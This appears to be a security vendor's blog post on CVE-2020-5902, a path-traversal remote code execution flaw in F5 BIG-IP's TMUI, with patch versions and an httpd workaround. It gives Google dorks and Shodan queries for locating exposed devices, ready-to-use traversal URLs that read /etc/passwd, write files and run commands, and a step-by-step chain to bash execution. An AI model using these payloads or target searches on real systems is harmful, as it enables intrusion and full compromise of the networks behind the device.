Home Vulnerabilities How to attack F5 BIG-IP using CVE-2020-5902 (TMUI RCE)

How to attack F5 BIG-IP using CVE-2020-5902 (TMUI RCE)

by Cristian Cornea
Reading Time: 5 minutes

Let’s tackle a vulnerability that broke out not only in BIG-IP firewalls but also on social media!

When a major issue affecting a security product emerges, it immediately makes the headlines, the paradox of the situation impossible to ignore. 

In this case, notoriety comes in second. What’s important is organizations that use BIG-IP firewalls push to patch and fix the vulnerability. Cybercriminals always move incredibly fast and they’re already exploiting it in the wild – especially since it’s surprisingly easy to do so.

bip ip tmui rce vulnerability

Keep reading for the practical steps to identify and fix this vuln. Let’s get to the action part!

Vulnerability Overview

The issue occurs in the Traffic Management User Interface (TMUI) functionality of multiple BIG-IP products. The TMUI is basically a configuration utility that allows authenticated users to manage their product and adjust its settings.

But researchers found a way to bypass the authentication and access those utility modules through one-line payloads in an URL, allowing attackers to view, delete, upload, and execute unauthorized files without being authenticated, which can lead to Remote Code Execution and full device compromise.

The vulnerability instantly got a 10/10 CVSS score and was tagged as CVE-2020-5902.

What is BIG-IP?

BIG-IP is a multi-purpose application that provides various app-centric services such as traffic management, load balancing, web application firewall, and so on. A wide range of companies use it, including a large number of Fortune 500 organizations across industries.

With a high-severity vulnerability like this, you can bet attackers reacted like sharks that smell blood in the water.

Affected versions

The issue is present within the following BIG-IP products: LTM, AAM, AFM, Analytics, APM, ASM, DNS, FPS, GTM, Link Controller, PEM.

You can find CVE-2020-5902 in these BIG-IP products versions:

  • 15.0.0 through 15.1.0.3
  • 14.1.0 through 14.1.2.5
  • 13.1.0 through 13.1.3.3
  • 12.1.0 through 12.1.5.1
  • 11.6.1 through 11.6.5.1

It’s also important to know that applications running on both Linux and Windows are vulnerable.

Find BIG-IP deployments using Google Dorks and Shodan

You can search for potentially vulnerable BIG-IP deployments using these Google dorks:

inurl:”/my.policy” big ip

Inurl:my.logout.php3?

inurl:/tmui/login.jsp/

discover-BIG-IP-deployments-using-Google-Dorks

Or this query for Shodan:

http.title:”BIG-IP®-Redirect”
discover BIG-IP deployments using Shodan

(A Shodan search query returned more than 8,471 possible vulnerable BIG-IP instances.)

Impact

Many people make the mistake to see that this vulnerability impacts only the BIG-IP application, but it’s a lot worse because it has a major impact on ALL the systems that are behind this product, leading to complete infrastructure compromise.

Check if a system is vulnerable

If you want to act fast and check if your system is exposed because of this vulnerability, we’ve just released a dedicated scanner: the BIG-IP Vulnerability Scanner (CVE-2020-5902).

You can scan your infrastructure fast and with minimal setup, shaving off hours of manual work. Plus, you get to buy time for patching and making sure you’re safe against opportunistic cyberattacks.

Root cause

Fundamentally, CVE-2020-5902 is a path traversal issue that allows attackers to access the utility modules within the TMUI functionality.

The situation is very similar to the one in December 2019, when CVE-2019-19781 was publicly disclosed. That traversal vulnerability found in Citrix ADC and Gateway had the potential to lead to Remote Code Execution too.

Exploit Overview

If the exploit for this vuln were complex and obscure, this vulnerability would’ve never made too many headlines. The fact that it’s so simple made it wildly popular and heavily abused – mostly by script kiddies.

You can exploit this vulnerability yourself by easily crafting a request payload that follows the syntax below:

PROTOCOL://HOST/UNAUTH_PAGE..;TMUI_MODULE

Where:

  • PROTOCOL: http/https
  • HOST: target IP address or hostname
  • UNAUTH_PAGE: page within the TMUI application where you got unauthenticated access (for example: /tmui/login.jsp/)
  • TMUI_MODULE: full path of the module through which you want to perform specific actions (please refer to the below table for more information)

As usual, we like making your work easier, so here’s a table with TMUI modules and instructions on how to exploit them.

ModuleExploitationPayload Example
directoryListList files within a folder specified through the directoryPath URL parameterhttps://HOST/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/tmp/
fileReadRead a file content specified through the fileName URL parameterhttps://HOST/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
fileSaveUpload a file specified through the fileName URL parameter and content of the file specified through the content URL parameter, using POST method.https://HOST/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=test
tmshCmdExecute predefined (based on their documentation) system commands through the command URL parameterhttps://HOST/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user

Achieve RCE and take home a firewall

You can achieve Remote Code Execution on the BIG-IP TMUI by chaining the fileSave and tmshCmd utility modules.

First, you need to send this payload in order to be able to execute bash commands:

https://HOST/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash (GET method)

Next, you’ll have to upload a file containing the command you want to execute on the system:

https://HOST/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/rce&content=whoami (POST method) – Here we uploaded the /tmp/rce file containing the whoami command.

Finally, you must list the file and you’ll see the output of the executed command reflected in the file content:

https://HOST/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/rce

(GET method)

Where you can find a working PoC

Where can’t you find one?

A quick search on GitHub returned no less than 435 results so far!

CVE-2020-5902 exploit poc-github

 

(GitHub search for CVE-2020-5902 exploits)

A Metasploit module was also published:

metaspoit module f5 big ip tmui

(CVE-2020-5902 Metasploit Module)

How to fix CVE-2020-5902

The best solution is to update your BIG-IP appliances immediately to these versions or to the latest ones:

  • 15.1.0.4+ (for 15.x branch)
  • 14.1.2.6+ (for 14.x branch)/li>
  • 13.1.3.4+ (for 13.x branch)
  • 12.1.5.2+ (for 12.x branch)
  • 11.6.5.2+ (for 11.x branch)

Also, if the upgrade is not possible, you can apply the mitigation below, which won’t impact your infrastructure or application performance.

Through the TSMH shell, issue this command edit /sys httpd all-properties, and insert the following payloadinside the include ‘none’ line:

include ‘

<LocationMatch “.*\.\.;.*”>

Redirect 404 /

</LocationMatch>

After that, save the configuration using this command: save /sys config

The above workaround prevents requests using ..; to be executed.

Another best practice would be to deny all the external access to the TMUI configuration utility at the firewall level.

If you found this guide helpful, let us know in the comments below or share it with a colleague or peer who’s dealing with the issue. You might just make their day much easier to bear!

0 comments

Related Posts

Comments